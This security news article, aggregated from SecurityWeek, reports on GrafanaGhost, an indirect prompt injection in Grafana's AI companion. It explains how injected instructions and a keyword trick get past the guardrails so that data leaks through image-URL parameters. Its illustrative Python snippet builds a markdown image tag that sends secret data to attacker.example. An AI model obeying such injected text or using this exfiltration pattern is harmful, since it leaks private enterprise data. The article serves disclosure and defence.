
GrafanaGhost: Attackers Can Abuse Grafana to Leak Enterprise Data

By targeting Grafana’s AI components, attackers can point to external resources and inject indirect prompts to bypass safeguards.

Fixed Intel Team

Aggregated from SecurityWeek


Full Analysis

A vulnerability in how Grafana’s AI components process information could allow attackers to bypass the application’s safeguards and leak enterprise information, new research from Noma Security shows.

An open source analytics and visualization application that ingests data from various sources, Grafana often has broad access to enterprise data, including financial metrics, infrastructure, customer information, and telemetry.

The newly discovered vulnerability, named GrafanaGhost, allows attackers to bypass client-side protections and security guardrails and leak private data to external servers, exposing sensitive information in the background without user interaction.

An attacker can exploit the weakness by targeting Grafana’s AI-based capabilities when a user interacts with a log entry. In the background, a malicious prompt triggers the issue, turning Grafana into the exfiltration vessel.

To mount the attack, a threat actor needs to craft a path pointing to external resources. When Grafana processes the log entry, it provides the attacker with access to the enterprise environment.

Next, the attacker uses an indirect prompt hidden in the external context, instructing Grafana’s AI companion to ignore its guardrails and render an external image, forcing the system to acknowledge an external URL.


When attempting to render the image, the AI companion makes a request to the attacker’s server, and the victim’s data is sent along as a URL parameter. “The data leaks the moment the system tries to display the image,” Noma says.
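As a hypothetical illustration (the server name, file path, and parameter name below are invented for this sketch, not taken from Noma's research), the exfiltration step amounts to embedding stolen text in the query string of an image URL that the AI companion is tricked into rendering:

```python
from urllib.parse import quote

# Hypothetical example only: none of these names come from the actual research.
secret = "customer_db_host=10.0.4.17"  # data the AI companion can see
exfil_url = f"https://attacker.example/pixel.png?d={quote(secret)}"

# Markdown image tag the injected prompt asks the model to emit.
# The moment a client fetches this "image", the query string delivers the data.
markdown_payload = f"![loading]({exfil_url})"
print(markdown_payload)
```

No user click is needed: simply rendering the markdown causes the browser or renderer to issue the GET request carrying the data.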

The issue, the cybersecurity firm discovered, was that the attacker could “fake the path of any company using Grafana” by guessing the data structure and model. Furthermore, an attacker could use a location where prompts would be saved within the application’s data store.

From there, the attacker could abuse Grafana to exfiltrate data via image tags by crafting their prompts accordingly. While Grafana has protections in place that prevent the loading of images from external domains, a flaw in a function that validates image URLs could be exploited to bypass the protection.
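The article does not publish Grafana's actual validation code, so the following is a generic sketch of an assumed flaw class: a substring-based URL check that looks like it pins images to a trusted domain but can be bypassed by putting the trusted name elsewhere in the URL. A host-based check closes the gap:

```python
from urllib.parse import urlparse

def naive_is_allowed(url: str) -> bool:
    # Flawed (hypothetical) check: looks for the trusted name anywhere
    # in the string instead of validating the parsed hostname.
    return "grafana.com" in url

def strict_is_allowed(url: str) -> bool:
    # Safer: parse the URL and compare the actual hostname.
    host = urlparse(url).hostname or ""
    return host == "grafana.com" or host.endswith(".grafana.com")

# The trusted name appears as a subdomain of the attacker's own domain.
bypass = "https://grafana.com.attacker.example/pixel.png"
print(naive_is_allowed(bypass))   # the substring check is fooled
print(strict_is_allowed(bypass))  # the hostname check is not
```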

The AI model also has guardrails in place to prevent the injection of prompts that contain image markdown, but Noma discovered that the keyword “intent” could be used to bypass the protection and signal to the model that the instruction was legitimate.

“Chaining these discoveries together, we achieved automatic data exfiltration with zero user interaction. Data exfiltration occurs entirely in the background. To the data team, DevSecOps, or CISO, it looks like a typical day of data visualization,” Noma notes, adding that Grafana addressed the weaknesses immediately after being notified.

According to BeyondTrust deputy CISO Bradley Smith, the use of indirect prompt injections to exfiltrate data via rendered content is a well-known attack vector, and the exploitability against a hardened Grafana deployment is less clear.

“The practical exploitability depends heavily on deployment specifics; whether AI features are enabled, whether egress controls are in place, and how the environment handles external data ingestion. This isn’t a universal bypass of Grafana; it’s a demonstration of what can happen when AI components process untrusted input without sufficient architectural controls around them,” Smith said.

According to Acalvio CEO Ram Varadarajan, GrafanaGhost illustrates that the broad adoption of AI has shifted defenses beyond the application layer, requiring network-level URL blocking and hardening AI against prompt injection.

“Ultimately, this exploit proves that perimeter controls are insufficient. The only way to secure AI-driven tooling is to shift from monitoring what an agent is told to performing runtime behavioral monitoring of what it actually does,” Varadarajan said.
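One hedged sketch of the runtime behavioral monitoring Varadarajan describes: instead of inspecting what the agent is told, scan what it actually emits and flag external image URLs that carry query parameters, a telltale of this exfiltration pattern. Function and host names here are illustrative, not from any vendor's product:

```python
import re
from urllib.parse import urlparse, parse_qs

# Matches markdown image tags and captures the URL inside the parentheses.
IMAGE_MD = re.compile(r"!\[[^\]]*\]\(([^)]+)\)")

def suspicious_images(markdown: str, trusted_hosts: set[str]) -> list[str]:
    """Return image URLs that point outside trusted_hosts AND carry a query string."""
    hits = []
    for url in IMAGE_MD.findall(markdown):
        p = urlparse(url)
        if p.hostname and p.hostname not in trusted_hosts and parse_qs(p.query):
            hits.append(url)
    return hits

output = "Here is your chart: ![loading](https://evil.example/p.png?d=secret)"
print(suspicious_images(output, {"grafana.com"}))
```

A check like this runs on the agent's output at render time, which is why it catches the attack even when the injected instructions arrived through a channel the prompt filters never saw.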

Related: Google DeepMind Researchers Map Web Attacks Against AI Agents

Related: Why Agentic AI Systems Need Better Governance – Lessons from OpenClaw

Related: AI, APIs and DDoS Collide in New Era of Coordinated Cyberattacks

Related: Vulnerability Allowed Hijacking Chrome’s Gemini Live AI Assistant


Originally published by SecurityWeek
